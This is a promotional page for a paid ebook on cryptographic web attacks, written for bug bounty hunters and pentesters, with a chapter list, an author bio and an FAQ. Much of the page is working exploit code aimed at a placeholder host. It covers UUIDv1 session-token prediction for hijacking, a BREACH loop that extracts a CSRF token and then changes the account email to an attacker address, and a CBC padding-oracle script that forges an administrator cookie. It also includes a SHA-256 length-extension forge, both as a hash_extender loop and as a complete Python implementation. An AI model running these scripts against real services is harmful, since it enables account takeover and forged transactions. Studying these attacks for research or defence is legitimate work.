AfterMath Series — Book 1

AfterMath Crypto Exploitation Statistical Attacks Part 1 of 3

Not algorithm confusion. Not token forgery. Something deeper. Padding oracles. Compression oracles. PRNG seed recovery. Hash length extension. The server leaks math through its behavior. You iterate. The secret surrenders.

$29 (regular price $39, save $10)
Get Your Copy

30-day money-back guarantee · PDF format · Instant download

58 Pages
5 Chapters
21 CVEs Covered
4 Attack Families

The Attack Paradigm

Broken Token used FFF (Find, Forge, Fire).
AfterMath uses LIT.

FFF works when you manipulate known structure — a JWT header, an OAuth parameter. Crypto attacks are different. The key is unknown. The format is opaque. What leaks is behavior — and behavior is math.

Step 01 · Leak

Induce the target to emit a behavioral signal that reveals information about secret cryptographic state. A timing delta. A Content-Length difference of three bytes. A distinct HTTP status code. The oracle exists before you exploit it.

Step 02 · Iterate

Apply mathematics to the leaked signal repeatedly. XOR computation. Interval narrowing. Frequency analysis. Seed reconstruction. This is not brute force: the work is bounded by the structure of the leak (at most 256 guesses per byte for a padding oracle, one timestamp window for a UUIDv1), not by the size of the key space.

Step 03 · Take

The math converges. Every PoC in this book fires a request and shows a result. Plaintext recovered. Session hijacked. Signature forged. Ciphertext accepted. None end on a hex dump or a theoretical calculation.


Taste the Content

Real math. Real PoCs. No placeholders.

Every technique comes with a LIT-labeled PoC — Leak, Iterate, Take. No theory without payload. Every command tested on Ubuntu 24.

Chapter 2 — Session Entropy: UUIDv1 Timestamp Prediction → Session Hijack
# LEAK — collect the attacker's own UUIDv1 session token
curl -s -c /tmp/j -d "user=attacker&pass=attacker" \
  -D /tmp/h https://target.com/login > /dev/null
TOKEN=$(grep -i "set-cookie" /tmp/h | grep -oP 'session=\K[^;]+')

# ITERATE — split the UUIDv1 into its fields, then walk a ±1 s window of
# 100 ns timestamps while keeping the node (MAC) and clock sequence fixed
python3 - "$TOKEN" << 'PY'
import sys, requests
t = sys.argv[1].replace('-', '')
tl, tm, th = int(t[0:8], 16), int(t[8:12], 16), int(t[12:16], 16) & 0x0FFF
base = (th << 48) | (tm << 32) | tl          # 60-bit timestamp in 100 ns ticks
clock_seq, mac = t[16:20], t[20:32]          # shared by every token from the same generator
print(f"MAC={mac} TS={base}")

def uuid1_at(ts):                            # rebuild a UUIDv1 with version nibble 1
    return (f"{ts & 0xFFFFFFFF:08x}-{(ts >> 32) & 0xFFFF:04x}-"
            f"{0x1000 | ((ts >> 48) & 0x0FFF):04x}-{clock_seq}-{mac}")

for d in range(-10_000_000, 10_000_000, 100):   # ±1 s in 10 µs steps
    tok = uuid1_at(base + d)
    r = requests.get("https://target.com/api/profile",
                     cookies={"session": tok}, timeout=1)
    if r.status_code == 200 and "email" in r.text:
        # TAKE — session hijacked, print token and response
        print(f"Hijacked: {tok}"); print(r.text[:200]); break
PY

Chapter 3 — Compression Oracles: BREACH — CSRF Token Extraction via Content-Length Delta
# LEAK — baseline compressed size with neutral prefix
baseline=$(curl -s -o /dev/null -w "%{size_download}" --compressed \
  -H "Cookie: session=$SESSION" -G --data-urlencode "q=AAAA" "$URL")

# ITERATE — extract CSRF token character by character
# -G --data-urlencode keeps '+', '/' and '=' intact; a bare ?q=+ would arrive as a space
CHARSET="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
KNOWN=""
while true; do
  best_char=""; best_size=99999
  for c in $(echo "$CHARSET" | fold -w1); do
    size=$(curl -s -o /dev/null -w "%{size_download}" --compressed \
      -H "Cookie: session=$SESSION" \
      -G --data-urlencode "q=${KNOWN}${c}" "$URL")
    [ "$size" -lt "$best_size" ] && best_size=$size && best_char=$c
  done
  KNOWN="${KNOWN}${best_char}"
  [ ${#KNOWN} -ge 44 ] && break
done

# TAKE — fire extracted token to perform state-changing action
curl -s -X POST https://target.com/account/email \
  -H "Cookie: session=$SESSION" \
  --data-urlencode "_csrf=$KNOWN" --data-urlencode "email=attacker@attacker.com" \
  -w "\nHTTP: %{http_code}"

Chapter 4 — Block Cipher Oracles: CBC Padding Oracle — Byte-by-Byte Decryption → Admin Token Forge
# LEAK — capture AES-CBC token, confirm oracle type
CT=$(curl -s -c /tmp/j.txt -D /tmp/h.txt "$URL/login" \
  -d "user=guest&pass=guest" > /dev/null && \
  grep -i "set-cookie" /tmp/h.txt | grep -oP "(?<=auth=)[^;]+")

# ITERATE — byte-by-byte padding oracle decryption
import base64, requests
block = 16
raw = base64.b64decode(CT + "=" * (-len(CT) % 4))   # CT from the LEAK step; the cookie strips '='
C_prev, C_curr = raw[:block], raw[block:2 * block]   # IV and first ciphertext block

def oracle(prev, cur):
  b64 = base64.b64encode(bytes(prev) + bytes(cur)).decode().rstrip('=')
  r = requests.get(f"{url}/profile", cookies={"auth": b64})
  return r.status_code != 500  # True = valid padding (error-differential oracle)

def intermediate_of(cur):
  inter, crafted = [0] * block, [0] * block   # inter = D_k(cur), recovered one byte at a time
  for pos in range(block - 1, -1, -1):
    pad_byte = block - pos
    for i in range(pos + 1, block):            # already-solved bytes must decrypt to pad_byte
      crafted[i] = inter[i] ^ pad_byte
    for guess in range(256):
      crafted[pos] = guess
      if oracle(crafted, cur):
        inter[pos] = guess ^ pad_byte; break
  return inter

plain = bytes(i ^ p for i, p in zip(intermediate_of(C_curr), C_prev))   # P1 = D_k(C1) XOR IV
print(f"Block 1 plaintext: {plain}")

# TAKE — forge admin cookie block by block (last block first), submit, confirm escalation
target_plain = b'{"user":"admin","role":"administrator"}\x09\x09\x09\x09\x09\x09\x09\x09\x09'
forged = [bytes(block)]                          # any final block works; its intermediate is recovered
for i in range(len(target_plain) - block, -1, -block):
  inter = intermediate_of(forged[0])
  forged.insert(0, bytes(inter[j] ^ target_plain[i + j] for j in range(block)))
cookie = base64.b64encode(b"".join(forged)).decode().rstrip('=')   # IV || C1 || C2 || C3
r = requests.get(f"{url}/admin", cookies={"auth": cookie})
print(f"Admin access: HTTP {r.status_code}")

Chapter 5 — Hash Attacks: Merkle-Damgård Length Extension — API Signature Forge
# LEAK — fingerprint MAC construction from signature length
SIG=$(curl -s -o /dev/null -D /tmp/h.txt "$URL/v1/action?user=guest&amount=10" && \
  grep -i "x-signature" /tmp/h.txt | grep -oP '[a-f0-9]{64}')
# 64 hex chars → SHA-256; if it is sha256(secret||data) rather than HMAC, the
# signature is a resumable hash state → length extension

# ITERATE — enumerate secret length; for each candidate hash_extender emits the
# extended message (data + glue padding + append) and the matching signature
for LEN in $(seq 1 32); do
  OUT=$(hash_extender --data "user=guest&amount=10" --signature "$SIG" \
    --append "&amount=99999" --format sha256 --secret "$LEN" \
    --out-data-format html)
  NEW_SIG=$(echo "$OUT" | grep "New signature:" | awk '{print $NF}')
  NEW_MSG=$(echo "$OUT" | grep "New string:" | awk '{print $NF}')   # %XX-encoded, padding included
  CODE=$(curl -s -o /dev/null -w "%{http_code}" \
    "$URL/v1/action?${NEW_MSG}&sig=${NEW_SIG}")
  [ "$CODE" != "403" ] && echo "Secret len $LEN — server accepted" && break
done

# TAKE — escalated API action accepted with forged signature (last amount= wins)
curl -s -X POST "$URL/v1/action" \
  -d "${NEW_MSG}&sig=${NEW_SIG}" -w "\nHTTP: %{http_code}"


Table of Contents

All 5 Chapters

Each chapter follows the same structure: attack mechanics, framework behavior table, CVEs, LIT-labeled primitives, hunting notes, detection signals.

CH 01
Foundations
Entropy & PRNGs · Session tokens · Side channels & oracles · CBC mode · Hash functions & MACs · XOR & stream ciphers · From FFF to LIT
7 pages
CH 02
Session Entropy
UUIDv1 timestamp prediction · PHP Mersenne Twister seed recovery · Timestamp-seeded token forge · Spring LCG property prediction
9 pages
CH 03
Compression Oracles
BEAST · CRIME · BREACH · Compression Oracle Probe · Express CSRF extraction · Django/Nginx silent compression · Spring Security CSRF downgrade
10 pages
CH 04
Block Cipher Oracles
Oracle Classifier · Error differential decryption · Node.js JWE timing oracle · IV+CBC token forge · CBC mode math · PKCS#7 padding · Lucky Thirteen
13 pages
CH 05
Hash Attacks
Signature Surface Probe · API signature forge · XOR keystream recovery · Merkle–Damgård length extension · Many-time pad · CVE-2025-65945
10 pages
APX
Appendix — Quick Reference
Tool setup (hash_extender, php_mt_seed) · Token decode · UUIDv1 inspector · Block size detection · Oracle classifier · CSRF stability check · XOR analysis
6 pages

What's Inside

Every statistical attack layer

From entropy collapse to timing deltas — every layer where cryptographic implementations leak their secrets through observable behavior.

01
Original Detection Primitives

Oracle Classifier, Compression Oracle Probe, Signature Surface Probe — three original named tools that identify which oracle type the target exposes before running any extraction. No existing scanner packages these as standalone pre-flight checks.

02
PRNG Recovery — 4 Failure Classes

UUIDv1 MAC+timestamp enumeration, PHP MT19937 seed recovery from 2 outputs, timestamp-seeded token forge from HTTP Date header, Spring LCG state recovery from actuator. CVE-2026-40975, CVE-2024-45719, CVE-2025-22150, CVE-2026-41505.

03
BREACH — Nginx Silent Compression

The most common misconception in bug bounty reports: "our app doesn't use compression." Nginx does, silently, at the proxy layer. Django behind Nginx is identifiable by three response headers. The oracle exists at the infrastructure level regardless of app config.

04
Padding Oracle — 3 Oracle Types

Error differential, length differential, and timing oracles require different Iterate strategies. The Oracle Classifier selects the correct strategy automatically. Covers ASP.NET POET, Node.js JWE (GHSA-58f5-hfqc-jgch), Tomcat EncryptInterceptor (CVE-2026-29146).

05
Hash MAC Forgery — One Request

Signature length identifies the hash family. Secret length enumeration (1–32 bytes) confirms raw hash vs HMAC in seconds. Parameter pollution delivers the forged payload: the appended &amount= overrides the signed one on a last-value-wins parser. No oracle loop, no timing infrastructure. At most 32 probe requests to find the secret length, then one tool invocation to forge.

06
Tooling: bash, curl, Python stdlib

No external crypto libraries required for Part 1. All PoCs run on Ubuntu 24 with standard tools plus two compiled utilities: hash_extender (Ch5) and php_mt_seed (Ch2). The appendix provides install commands and test one-liners for both.


Original Research

Named by this book*

Three detection primitives named, framed, and documented here for the first time. No existing tool, scanner, or public resource packages these as standalone pre-flight checks.

Chapter 4 — Block Cipher Oracles
Oracle Classifier

Before committing to a full CBC decryption run, this primitive sends one malformed ciphertext and probes all three oracle signal types simultaneously — error differential, length differential, and timing — then routes automatically to the correct Iterate strategy. Running a padding oracle attack against the wrong signal type wastes hundreds of requests and returns garbage. No existing tool performs this classification step before running.

→ selects correct attack path before extraction begins
Chapter 3 — Compression Oracles
Compression Oracle Probe

BREACH requires three simultaneous preconditions: HTTP-level compression active, attacker-controlled input reflected in the compressed body, and a static secret in the same response. Most hunters check these manually across three separate requests. This primitive automates all three in a single pass — compression header, canary reflection, and token stability — and reports oracle viability with a single command before the extraction loop starts.

→ confirms BREACH oracle in one command, eliminates false starts
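An offline rendering of the oracle this probe confirms and the Chapter 3 excerpt exploits, added as an example (not the book's code): a constructed page carries a static CSRF token and reflects a query parameter after it, the response is gzipped, and the attacker observes only the compressed length. Page text, token, anchor string and charset are assumptions. Compression is forced to a fixed Huffman table (Z_FIXED) so the LZ77 effect shows up as an exact one-byte delta; production gzip uses dynamic tables, which adds about a byte of noise that a real extraction has to re-measure or average out.

```python
import zlib

CSRF_TOKEN = "k3Yx9QpL2mWz"    # constructed secret embedded in the page, never read directly
CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
ANCHOR = 'name="csrf" value="'  # page text just before the token; the guess rides on it

def render(q):
    """Constructed response body: static token first, reflected input after it
    (LZ77 back-references only point backwards, so this order matters)."""
    return (f'<form><input type="hidden" name="csrf" value="{CSRF_TOKEN}"></form>'
            f'<p>Search: {q}</p>').encode()

def content_length(q):
    """Bytes on the wire once gzipped: the only thing the attacker observes.
    Z_FIXED pins the Huffman table so a correct guess is exactly one byte
    smaller than a wrong one (one literal absorbed into the back-reference)."""
    z = zlib.compressobj(6, zlib.DEFLATED, 31, 8, zlib.Z_FIXED)
    return len(z.compress(render(q)) + z.flush())

def extract_token(max_len=64):
    """ITERATE: extend the known prefix by whichever character does not grow the
    response; when every candidate grows it, the token is complete."""
    known, sent = "", 0
    while len(known) < max_len:
        base = content_length(ANCHOR + known)
        sizes = {c: content_length(ANCHOR + known + c) for c in CHARSET}
        sent += 1 + len(CHARSET)
        best = min(CHARSET, key=sizes.get)
        if sizes[best] > base:          # no candidate was absorbed: prefix is the whole token
            break
        known += best
    return known, sent

if __name__ == "__main__":
    token, sent = extract_token()
    print(f"recovered {token!r} in {sent} requests; correct: {token == CSRF_TOKEN}")
```

The three preconditions the probe checks are all visible in `render` and `content_length`: the body is compressed, the attacker's input lands in the same body, and the token does not change between requests. Remove any one and the size delta disappears.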
Chapter 5 — Hash Attacks
Signature Surface Probe

A 64-character hex signature could be HMAC-SHA-256 or a raw SHA-256 hash of secret||data: identical length, completely different vulnerability profile. This primitive fingerprints the construction behaviorally: it enumerates secret lengths 1–32 and fires forged requests via hash_extender until the server accepts one. Acceptance is binary and unambiguous. No timing analysis, no oracle loop. A raw hash MAC is confirmed in under a minute. If no length in 1–32 is accepted, the construction is HMAC, or a raw hash with a secret longer than 32 bytes or a layout other than secret||data, so widen the length range before concluding HMAC.

→ distinguishes HMAC from raw hash MAC before forge attempt

* Original as of publication date — first named writeup or first standalone implementation for each primitive.
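The Signature Surface Probe's logic and the Chapter 5 forge, carried out offline as an added example (not the book's code and not hash_extender): a pure-Python SHA-256 whose internal state can be resumed from a published digest, a constructed API that signs with sha256(secret || message), and the 1–32 secret-length enumeration with an HMAC variant for contrast. The secret, parameter names and the last-value-wins parameter parser are assumptions; the SHA-256 constants are derived from their FIPS 180-4 definitions rather than typed in.

```python
import hashlib
import hmac
import math
import struct

MASK = 0xFFFFFFFF

def first_primes(n):
    primes, x = [], 2
    while len(primes) < n:
        if all(x % p for p in primes):
            primes.append(x)
        x += 1
    return primes

def icbrt(n):
    """Floor of the integer cube root: Newton's method from an overestimate."""
    x = 1 << ((n.bit_length() + 2) // 3)
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y

# FIPS 180-4: H0 = frac(sqrt(p)) * 2^32 for the first 8 primes, K = frac(cbrt(p)) * 2^32 for 64
PRIMES = first_primes(64)
H0 = [math.isqrt(p << 64) & MASK for p in PRIMES[:8]]
K = [icbrt(p << 96) & MASK for p in PRIMES]

def _rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK

def _compress(state, chunk):
    """One SHA-256 compression of a 64-byte chunk into the 8-word state."""
    w = list(struct.unpack('>16L', chunk))
    for i in range(16, 64):
        s0 = _rotr(w[i - 15], 7) ^ _rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = _rotr(w[i - 2], 17) ^ _rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + (_rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25))
              + ((e & f) ^ (~e & g)) + K[i] + w[i]) & MASK
        t2 = ((_rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22))
              + ((a & b) ^ (a & c) ^ (b & c))) & MASK
        a, b, c, d, e, f, g, h = (t1 + t2) & MASK, a, b, c, (d + t1) & MASK, e, f, g
    return [(x + y) & MASK for x, y in zip(state, (a, b, c, d, e, f, g, h))]

def md_pad(msg_len):
    """Merkle-Damgard padding for msg_len bytes: 0x80, zeros to 56 mod 64, 64-bit bit length."""
    return b'\x80' + b'\x00' * ((55 - msg_len) % 64) + struct.pack('>Q', msg_len * 8)

def sha256(data, state=None, prior_len=0):
    """SHA-256 of data; given state and prior_len (a multiple of 64), resume as if
    prior_len bytes had already been absorbed. This resumption is the whole attack."""
    st = list(state) if state is not None else list(H0)
    padded = data + md_pad(prior_len + len(data))
    for i in range(0, len(padded), 64):
        st = _compress(st, padded[i:i + 64])
    return struct.pack('>8L', *st)

def extend(sig_hex, data, append, secret_len):
    """From sig = sha256(secret||data) and a guessed secret length, return
    (data||glue||append, sha256(secret||data||glue||append)) without knowing secret."""
    state = struct.unpack('>8L', bytes.fromhex(sig_hex))
    glue = md_pad(secret_len + len(data))
    absorbed = secret_len + len(data) + len(glue)        # block-aligned by construction
    return data + glue + append, sha256(append, state, absorbed).hex()

# --- constructed target API: the secret is never visible to the attacker ---
SECRET = b"s3cr3t-api-key-42"

def sign_raw(msg):                   # vulnerable construction: sha256(secret || message)
    return hashlib.sha256(SECRET + msg).hexdigest()

def sign_hmac(msg):                  # safe construction, for contrast
    return hmac.new(SECRET, msg, "sha256").hexdigest()

def raw_accepts(msg, sig_hex):
    return hmac.compare_digest(sign_raw(msg), sig_hex)

def hmac_accepts(msg, sig_hex):
    return hmac.compare_digest(sign_hmac(msg), sig_hex)

def probe_secret_length(accepts, data, sig_hex, append, max_len=32):
    """Signature Surface Probe logic: the first secret length whose forgery the server
    accepts proves a raw-hash MAC. None means HMAC, or a secret longer than max_len."""
    for n in range(1, max_len + 1):
        msg, forged = extend(sig_hex, data, append, n)
        if accepts(msg, forged):
            return n, msg, forged
    return None

def last_param(query, name):
    """Parameter pollution on a last-value-wins parser: the appended amount= wins."""
    value = None
    for kv in query.split(b'&'):
        k, _, v = kv.partition(b'=')
        if k == name:
            value = v
    return value

if __name__ == "__main__":
    data = b"user=guest&amount=10"
    n, msg, forged = probe_secret_length(raw_accepts, data, sign_raw(data), b"&amount=99999")
    print(f"secret length {n}; forged request accepted; amount={last_param(msg, b'amount')}")
```

The forged message carries the glue padding (0x80, zeros and the 64-bit length) between the original query string and the appended parameter, which is why the request must be sent as the extended string rather than a freshly built query; a server whose parser rejects those bytes closes the hole even with a raw-hash MAC.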


The AfterMath Series

Three volumes. One attack surface.

Statistical attacks are where most real-world cryptographic vulnerabilities live. Algebraic attacks go deeper. Frontier attacks go further. Same LIT paradigm. Escalating math.

Part 1 — Available Now
Statistical Attacks
// behavior is the oracle

Entropy collapse, compression oracles, CBC padding oracles, hash construction failures. Tools: bash, curl, Python. No algebraic solvers required.

  • PRNG recovery
  • BREACH / CRIME
  • Padding oracle
  • Length extension
  • XOR key reuse
Get Part 1 →
Part 2 — Coming Soon
Algebraic Attacks
// math breaks the key

RSA padding oracles, AES-GCM nonce reuse, biased ECDSA nonce lattice reduction. Tools: fpylll, SageMath. Heavier math, same LIT paradigm.

  • ROBOT / Bleichenbacher
  • GCM tag forgery
  • ECDSA lattice
  • Marvin timing
  • Nonce & IV attacks
// in development
Part 3 — Research Stage
Frontier Attacks
// the next attack surface

ZK proof malleability, FHE timing side-channels, generalized lattice attacks. Some chapters may not have real BB targets yet. Forward-looking by design.

  • ZK failures
  • FHE oracles
  • Black-box cryptanalysis
  • Coppersmith
  • LWE misuse
// research in progress

Author
Rodolfo Assis
BRUTE LOGIC · @BRuteLogic
15+ years · 1,461 reports · KNOXSS creator · Brute One · BSides Boston 2016 · DEF CON 25 · Ekoparty 2025 · Top 200 Influencer 2021 · 6 ebooks · 65K+ followers

Brazilian offensive security researcher with 15+ years breaking web applications. Creator of KNOXSS — the most comprehensive automated XSS service, live since 2016 — and X55.is, a universal XSS delivery domain. Founder of Brute One, an AI assistant for bug bounty hunting with tool execution capabilities and proprietary offensive knowledge.

Author of: First Bounty, The Brute Art of Bypass, SSRF Mastery Series — Fundamentals, the Broken Token Series, and now AfterMath: Crypto Exploitation. Writing Security in Collapse, a cyberpunk doctrine for the Intelligence Age. Building the King of Noobs recon suite on GitHub — reKover, unKover, disKover.

Spoke at BSides Boston 2016, DEF CON 25, and Ekoparty 2025. Ranked #1 globally on Open Bug Bounty in 2015. 1,000+ vulnerabilities disclosed against Oracle, Apple, Microsoft, Samsung, Slack, Uber, LinkedIn. Listed among 200 Global Cybersecurity Influencers by Check Point (2021).


Questions

FAQ

Who is this for?

Intermediate to advanced bug bounty hunters and pentesters who understand web security fundamentals and want to move into cryptographic attack territory. You should be comfortable reading curl commands and Python. You don't need a math degree — the Iterate step is explained from first principles in every chapter.

How is this different from the Broken Token series?

Broken Token attacks the protocol layer — JWT headers, OAuth parameters, SAML assertions — using the FFF paradigm. AfterMath attacks the cryptographic layer beneath the protocol — the PRNG that generated the token, the cipher mode that encrypted it, the hash function that signed it. These are different attack surfaces. The LIT paradigm replaces FFF because the attacker can't manipulate the format directly — they have to read it through the server's behavior.

Do the commands actually work?

Yes. Every command was tested on Ubuntu 24 before inclusion. No placeholder code. No theoretical payloads. Every Take step fires a real request against a real endpoint and shows a result.

What tools are required?

For Part 1: bash, curl, Python 3 (standard library plus the requests module the PoCs use for HTTP), and two compiled utilities: hash_extender for Chapter 5 and php_mt_seed for Chapter 2. Both are open source; install instructions and test commands are in the appendix. No external crypto libraries required.

Do I need to read the Broken Token series first?

No. Each series is independent. The Chapter 4 JWE timing primitive includes a crossover note explaining the relationship between JWE's CBC internals and Broken Token: JWT's algorithm confusion attacks, but Part 1 stands alone.

What frameworks are covered?

Spring Boot, ASP.NET Web Forms and Core, Node.js (Express, Next.js, jose npm), Django, PHP (mt_rand, mcrypt, WooCommerce payment plugins), Java (java.util.Random, Bouncy Castle), Go (Satori UUID). Per-framework vulnerability tables in every attack chapter.


Get the Book

THE MATH BENEATH THE PROTOCOL BREAKS TOO.

58 pages. 4 attack families. 21 CVEs. LIT-labeled PoCs. Every technique tested. No placeholders.

$29 (regular price $39, save $10)
Buy Now

PDF format · Instant download · 30-day money-back guarantee

AI-assisted creation, thoroughly reviewed by the author. All technical content tested for accuracy.
Errors or suggestions: assis@brutelogic.net